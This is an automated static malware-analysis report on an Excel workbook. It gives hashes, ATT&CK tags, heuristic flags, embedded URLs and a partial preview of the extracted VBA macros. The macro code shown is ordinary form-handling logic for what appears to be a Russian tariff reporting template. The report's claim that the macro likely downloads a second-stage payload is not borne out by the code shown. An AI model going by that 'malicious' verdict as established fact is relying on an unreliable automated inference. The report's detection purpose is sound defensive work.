Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66c915e6284d557c…

MALICIOUS

Office (OLE)

2.00 MB Created: 2004-05-21 07:18:45 Authoring application: Microsoft Excel First seen: 2020-08-10
MD5: c64060d55bc5d48068a2841e8e8940b4 SHA-1: e91d0d3f7b0ce03dadc56ce5a5ada8cc452c1b83 SHA-256: 66c915e6284d557ca11bc3601520838cc5b54ea3e34f9c866c4f0c207fcedad4
144 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is an Excel file containing a Workbook_Open VBA macro. This macro is designed to execute obfuscated VBA code, likely to download and execute a second-stage payload. The presence of CreateObject and XMLHTTP calls within the auto-executing macro strongly suggests network activity for payload retrieval. The document body contains what appears to be financial or organizational data, potentially used as a lure.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.fstrf.ru/regions/region/showlist� In document text (OLE body)
    • http://www.gmcgks.ru/index.php?id=21036In document text (OLE body)
    • http://www.gmcgks.ru/index.php?id=21046In document text (OLE body)
    • http://tariff.support/index.php?a=add&catid=67�In document text (OLE body)
    • https://tariff.eias.ru/procwsxls/�In document text (OLE body)
    • https://tariff.eias.ru/procwsxls/In document text (OLE body)
    • https://appsrv02.eias.ru/procwsxls/In document text (OLE body)
    • https://appsrv01.eias.ru/procwsxls/In document text (OLE body)
    • https://eias.fstrf.ru/procwsxls/�In document text (OLE body)
    • https://altai-app.eias.ru/procwsxls/�In document text (OLE body)
    • http://rb-regservices.eias.ru/procwsxls/�In document text (OLE body)
    • https://eias.fstrf.ru/procwsxls/In document text (OLE body)
    • https://altai-app.eias.ru/procwsxls/In document text (OLE body)
    • http://rb-regservices.eias.ru/procwsxls/In document text (OLE body)
    • http://www.eias.ru/templates/In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=133360;dst=0;ts=976FAE4D17FED02FE84251FA347CBCC1;rnd=0.38204030096458275In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://www.gks.ru/metod/classifiers.html_In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=178809;fld=134;dst=100013;rnd=180312.43506395909935236;;ts=018031221943964948877692�In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=179370;fld=134;from=179211-102;rnd=180312.9268793507944793;;ts=0180312467623938806355�In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=139322;fld=134;dst=100008;rnd=180312.45840900391340256;;ts=018031229105898505076766�In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=186745;fld=134;from=179211-90;rnd=180312.18053538468666375;;ts=01803129223564297426492�In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=167465;fld=134;dst=100284;rnd=180312.07675228593870997;;ts=0180312020631691208109263In document text (OLE body)
    • http://tarif.omskportal.ru/procwsxls/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1191016 bytes
SHA-256: 3933236553507eacf4576b3858c6c9979622e03efcdeb2c6eee817de9e5129e2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)

    Application.Calculate
    
    modThisWorkbook.ThisWorkbook_Workbook_BeforeSave
    
    On Error GoTo ErrHandler
    
    Dim status As Integer
    status = ThisWorkbook.CustomDocumentProperties("Status")
    If status > 2 Then
      MsgBox "Документ подписан ЭЦП и не может быть изменен", vbExclamation + vbOKOnly, ThisWorkbook.name
      Cancel = True
      GoTo CleanUp
    End If
    
    GoTo CleanUp

ErrHandler:
    MsgBox Error.Description, vbOKOnly + vbExclamation, ThisWorkbook.name

CleanUp:

End Sub

Private Sub Workbook_Open()
  modThisWorkbook.ThisWorkbook_Workbook_Open
End Sub

Private Sub Workbook_BeforePrint(Cancel As Boolean)
  modThisWorkbook.ThisWorkbook_Workbook_BeforePrint
End Sub

Attribute VB_Name = "modChange"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Base 1
Option Explicit

Public Sub WsInstructionChange(Target As Range, _
                               ByRef cmdApplyContactChanges As CommandButton)
  
  If Target.Interior.ColorIndex = colorYellow Then
    cmdApplyContactChanges.Enabled = True
    cmdApplyContactChanges.Visible = True
  End If

End Sub

Public Sub WsTitleChange(Target As Range)
  
  On Error GoTo ErrWsTitleChange

  Dim wsSheet As Worksheet
  Dim intCounter As Integer
  Dim intColumnCounter As Integer
  Dim strMRName As String
  Dim strMOName As String
  Dim strOKTMOValue As String
  Dim strNameLineCode(7) As String  ' список кодов строк, содержащих формулы
  Dim strCopyRangeName As String
  Dim wbBook As Workbook
  Dim wsTechSheet As Worksheet
  Dim wsTEHSHEETSheet As Worksheet
  Dim wsWorkSheet As Worksheet
  Dim rngRange As Range
  Dim rngTempRange As Range
  Dim ISect

  Application.EnableEvents = False
  Application.ScreenUpdating = False

  Set wbBook = Me.Parent
  Set rngRange = wbBook.Names("MR_LIST").RefersToRange
  Set wsTechSheet = rngRange.Parent
  Set wsTEHSHEETSheet = wbBook.Sheets(gstrTehSheetSheetName)
  
  Set wsSheet = Target.Parent
  
  ' Признак филиала
  Set ISect = Application.Intersect(Target, wsSheet.Range("fil_flag"))
  If Not ISect Is Nothing Then
    
    modServiceModule.UNPROTECT_SHEET wsSheet
     
    If Target.cells(1, 1).value = "да" Then
      wsSheet.Range("fil").cells(1, 1).Select
      Selection.Interior.ColorIndex = colorCyan
      wsSheet.Range("fil").cells(1, 1).EntireRow.Hidden = False
      Selection.Locked = False
    Else
      wsSheet.Range("fil").cells(1, 1).Select
      Selection.ClearContents
      Selection.Interior.ColorIndex = colorWhite
      wsSheet.Range("fil").cells(1, 1).EntireRow.Hidden = True
      Selection.Locked = True
    End If
      
    Target.Select
    
    modServiceModule.PROTECT_SHEET wsSheet, True
    
    GoTo CleanUp
    
  End If
  
  ' Признак субъекта малого предпринимательства
  Set ISect = Application.Intersect(Target, wsSheet.Range("OrgIsSmallBusiness"))
  If Not ISect Is Nothing Then
    
    strNameLineCode(1) = "1100"
    strNameLineCode(2) = "1200"
    strNameLineCode(3) = "1600"
    strNameLineCode(4) = "1300"
    strNameLineCode(5) = "1400"
    strNameLineCode(6) = "1500"
    strNameLineCode(7) = "1700"
    
    For intCounter = LBound(strNameLineCode) To UBound(strNameLineCode)
        If modServiceModule.IsNameExists(wbBook, "LINE_" & strNameLineCode(intCounter) & "_1") And _
           modServiceModule.IsNameExists(wbBook, "LINE_" & strNameLineCode(intCount
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.